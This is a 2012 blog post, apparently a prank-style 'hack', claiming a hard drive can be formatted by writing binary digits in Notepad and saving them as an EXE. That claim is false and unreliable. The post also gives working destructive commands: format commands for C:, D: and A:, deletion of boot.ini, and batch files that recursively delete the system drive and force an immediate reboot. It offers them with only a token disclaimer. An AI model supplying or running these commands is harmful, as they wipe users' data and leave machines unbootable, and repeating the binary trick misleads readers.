Τρίτη, 22 Μαΐου 2012

Format a HDD with Notepad

Format a HDD with Notepad

 
 
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool.


Step 1.
Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will DoOR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000


format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its working

Do not try it on your PC. Don't mess around this is for educational purpose only

still if you cant figure it out try this

go to notepad and type the following:

@Echo off
Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

0 σχόλια:

Δημοσίευση σχολίου

Σημείωση: Μόνο ένα μέλος αυτού του ιστολογίου μπορεί να αναρτήσει σχόλιο.